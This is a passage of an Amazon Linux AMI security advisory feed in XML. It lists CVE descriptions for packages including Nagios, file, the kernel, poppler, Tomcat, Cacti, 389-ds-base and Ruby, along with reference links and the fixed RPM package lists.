Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers.
1121497:
CVE-2008-7313 CVE-2014-5008 CVE-2014-5009 snoopy: incomplete fixes for command execution flaws
CVE-2014-1878:
Stack-based buffer overflow in the cmd_submitf function in cgi/cmd.c in Nagios Core, possibly 4.0.3rc1 and earlier, and Icinga before 1.8.6, 1.9 before 1.9.5, and 1.10 before 1.10.3 allows remote attackers to cause a denial of service (segmentation fault) via a long message to cmd.cgi.
1066578:
CVE-2014-1878 nagios: possible buffer overflows in cmd.cgi
CVE-2013-7205:
Off-by-one error in the process_cgivars function in contrib/daemonchk.c in Nagios Core 3.5.1, 4.0.2, and earlier allows remote authenticated users to obtain sensitive information from process memory or cause a denial of service (crash) via a long string in the last key value in the variable list, which triggers a heap-based buffer over-read.
1046113:
CVE-2013-7108 CVE-2013-7205 nagios: denial of service due to off-by-one flaw in process_cgivars()
CVE-2013-7108:
Multiple off-by-one errors in Nagios Core 3.5.1, 4.0.2, and earlier, and Icinga before 1.8.5, 1.9 before 1.9.4, and 1.10 before 1.10.2 allow remote authenticated users to obtain sensitive information from process memory or cause a denial of service (crash) via a long string in the last key value in the variable list to the process_cgivars function in (1) avail.c, (2) cmd.c, (3) config.c, (4) extinfo.c, (5) histogram.c, (6) notifications.c, (7) outages.c, (8) status.c, (9) statusmap.c, (10) summary.c, and (11) trends.c in cgi/, which triggers a heap-based buffer over-read.
1046113:
CVE-2013-7108 CVE-2013-7205 nagios: denial of service due to off-by-one flaw in process_cgivars()
CVE-2013-4214:
rss-newsfeed.php in Nagios Core 3.4.4, 3.5.1, and earlier, when MAGPIE_CACHE_ON is set to 1, allows local users to overwrite arbitrary files via a symlink attack on /tmp/magpie_cache.
958002:
CVE-2013-4214 Nagios core: html/rss-newsfeed.php insecure temporary file usage
CVE-2008-7313:
Various command-execution flaws were found in the Snoopy library included with Nagios. These flaws allowed remote attackers to execute arbitrary commands by manipulating Nagios HTTP headers.
1121497:
CVE-2008-7313 CVE-2014-5008 CVE-2014-5009 snoopy: incomplete fixes for command execution flaws
CVE-2008-4796:
The _httpsrequest function (Snoopy/Snoopy.class.php) in Snoopy 1.2.3 and earlier, as used in (1) ampache, (2) libphp-snoopy, (3) mahara, (4) mediamate, (5) opendb, (6) pixelpost, and possibly other products, allows remote attackers to execute arbitrary commands via shell metacharacters in https URLs.
469320:
CVE-2008-4796 snoopy: command execution via shell metacharacters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4796" title="" id="CVE-2008-4796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7313" title="" id="CVE-2008-7313" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4214" title="" id="CVE-2013-4214" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7108" title="" id="CVE-2013-7108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7205" title="" id="CVE-2013-7205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1878" title="" id="CVE-2014-1878" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5008" title="" id="CVE-2014-5008" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5009" title="" id="CVE-2014-5009" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9566" title="" id="CVE-2016-9566" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nagios" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-common" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-common-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-debuginfo-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/nagios-devel-3.5.1-2.10.amzn1.x86_64.rpm</filename></package><package name="nagios-devel" version="3.5.1" release="2.10.amzn1" epoch="0" 
arch="i686"><filename>Packages/nagios-devel-3.5.1-2.10.amzn1.i686.rpm</filename></package><package name="nagios-common" version="3.5.1" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-common-3.5.1-2.10.amzn1.i686.rpm</filename></package><package name="nagios-debuginfo" version="3.5.1" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-debuginfo-3.5.1-2.10.amzn1.i686.rpm</filename></package><package name="nagios" version="3.5.1" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/nagios-3.5.1-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-900</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-900: important priority package update for file</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000249:
An issue in file(), introduced in commit 9611f31313a93aa036389c5f3b15eea53510d4d1 (Oct 2016), lets an attacker overwrite a fixed 20-byte stack buffer with a specially crafted .notes section in an ELF binary. This was fixed in commit 35c94dc6acc418f1ad7f6241a6680e5327495793 (Aug 2017).
1488053:
CVE-2017-1000249 file: Stack-based buffer overflow in do_bid_note()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000249" title="" id="CVE-2017-1000249" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="file-debuginfo" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="python27-magic" version="5.30" release="11.34.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-magic-5.30-11.34.amzn1.noarch.rpm</filename></package><package name="python26-magic" version="5.30" release="11.34.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-magic-5.30-11.34.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.30" release="11.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.30-11.34.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.30" release="11.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-libs-5.30-11.34.amzn1.i686.rpm</filename></package><package name="file-static" version="5.30" release="11.34.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.30-11.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-901</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-901: medium priority package update for kernel</title><issued date="2017-10-03 11:00:00" /><updated date="2017-10-03 11:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7558:
A kernel data leak due to an out-of-bounds read was found in the Linux kernel in the inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() functions, present since version 4.7-rc1 through version 4.13. The leak happens when these functions fill in the sockaddr data structures used to export a socket&#039;s diagnostic information. As a result, up to 100 bytes of slab data could be leaked to userspace.
1480266:
CVE-2017-7558 kernel: Out of bounds read in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() in SCTP stack
CVE-2017-14497:
A buffer overflow was discovered in the tpacket_rcv() function in the Linux kernel from v4.6-rc1 through v4.13. A number of socket-related syscalls can be used to set up a configuration in which each packet received by a network interface causes up to 10 bytes to be written to kernel memory outside of the kernel buffer. This can cause unspecified kernel data corruption effects, including damage to in-memory and on-disk XFS data.
1492593:
CVE-2017-14497 kernel: buffer overflow in tpacket_rcv() in net/packet/af_packet.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14497" title="" id="CVE-2017-14497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7558" title="" id="CVE-2017-7558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package 
name="kernel-tools" version="4.9.51" release="10.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.51-10.52.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.51" release="10.52.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.51-10.52.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.51" release="10.52.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.9.51-10.52.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-902</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-902: medium priority package update for poppler</title><issued date="2017-09-28 22:45:00" /><updated date="2017-09-29 21:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9776:
An integer overflow leading to a heap-based buffer overflow was found in the poppler library. An attacker could create a malicious PDF file that would cause applications that use poppler (such as Evince) to crash, or potentially execute arbitrary code when opened.
1466443:
CVE-2017-9776 poppler: Integer overflow in JBIG2Stream.cc
CVE-2017-9775:
A stack-based buffer overflow was found in the poppler library. An attacker could create a malicious PDF file that would cause applications that use poppler (such as Evince) to crash, or potentially execute arbitrary code when opened.
1466442:
CVE-2017-9775 poppler: Stack-buffer overflow in GfxState.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9775" title="" id="CVE-2017-9775" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9776" title="" id="CVE-2017-9776" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-cpp" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-17.17.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" 
release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-17.17.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="17.17.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-17.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-903</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-903: medium priority package update for tomcat7 tomcat8</title><issued date="2017-10-02 16:47:00" /><updated date="2017-10-02 21:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7674:
The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.
1480618:
CVE-2017-7674 tomcat: Vary header not added by CORS filter leading to cache poisoning
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7674" title="" id="CVE-2017-7674" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.81" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.81" release="1.29.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.81-1.29.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.46-1.76.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.46" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.46-1.76.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-904</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-904: medium priority package update for cacti</title><issued date="2017-10-02 16:54:00" /><updated date="2017-10-02 22:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12978:
lib/html.php in Cacti before 1.1.18 has XSS via the title field of an external link added by an authenticated user.
CVE-2017-12927:
A cross-site scripting vulnerability exists in Cacti 1.1.17 in the method parameter in spikekill.php.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12927" title="" id="CVE-2017-12927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12978" title="" id="CVE-2017-12978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-1.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-905</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-905: medium priority package update for 389-ds-base</title><issued date="2017-10-02 16:55:00" /><updated date="2017-10-02 21:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7551:
A flaw was found in the way 389-ds-base handled authentication attempts against locked accounts. A remote attacker could potentially use this flaw to continue password brute-forcing attacks against LDAP accounts, thereby bypassing the protection offered by the directory server&#039;s password lockout policy.
1477669:
CVE-2017-7551 389-ds-base: Password brute-force possible for locked account due to different return codes
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7551" title="" id="CVE-2017-7551" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-libs" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.6.1-19.51.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="19.51.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.6.1-19.51.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="19.51.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-19.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-906</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-906: medium priority package update for ruby22 ruby23</title><issued date="2017-10-02 17:01:00" /><updated date="2018-01-18 20:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14064:
Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issue lies in the use of strdup in ext/json/ext/generator/generator.c, which stops after encountering a &#039;\\0&#039; byte, returning a pointer to a string of length zero rather than the length stored in space_len.
1487552:
CVE-2017-14064 ruby: Arbitrary heap exposure during a JSON.generate call
CVE-2017-14033:
The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string.
1491866:
CVE-2017-14033 ruby: Buffer underrun in OpenSSL ASN1 decode
CVE-2017-10784:
The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name.
1492012:
CVE-2017-10784 ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick
CVE-2017-0903:
A vulnerability was found in the rubygems module: it performed unsafe YAML deserialization when inspecting a gem. Applications that inspect gem files without installing them can be tricked into executing arbitrary code in the context of the Ruby interpreter.
1500488:
CVE-2017-0903 rubygems: Unsafe object deserialization through YAML formatted gem specifications
CVE-2017-0902:
RubyGems version 2.6.12 and earlier is vulnerable to DNS hijacking, which allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls.
1487589:
CVE-2017-0902 rubygems: DNS hijacking vulnerability
CVE-2017-0901:
RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem.
1487587:
CVE-2017-0901 rubygems: Arbitrary file overwrite due to incorrect validation of specification name
CVE-2017-0900:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that cause a denial of service against RubyGems clients that have issued a `query` command.
1487588:
CVE-2017-0900 rubygems: No size limit in summary length of gem spec
CVE-2017-0899:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences.
1487590:
CVE-2017-0899 rubygems: Escape sequence in the "summary" field of gemspec
CVE-2017-0898:
Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string that contains a precision specifier (*) with a huge negative value. Such a situation can lead to a buffer overrun, resulting in heap memory corruption or an information disclosure from the heap.
1492015:
CVE-2017-0898 ruby: Buffer underrun vulnerability in Kernel.sprintf
CVE-2015-9096:
An SMTP command injection flaw was found in the way Ruby&#039;s Net::SMTP module handled CRLF sequences in certain SMTP commands. An attacker could potentially use this flaw to inject SMTP commands into an SMTP session in order to facilitate phishing attacks or spam campaigns.
1461846:
CVE-2015-9096 ruby: SMTP command injection via CRLF sequences in RCPT TO or MAIL FROM commands in Net::SMTP
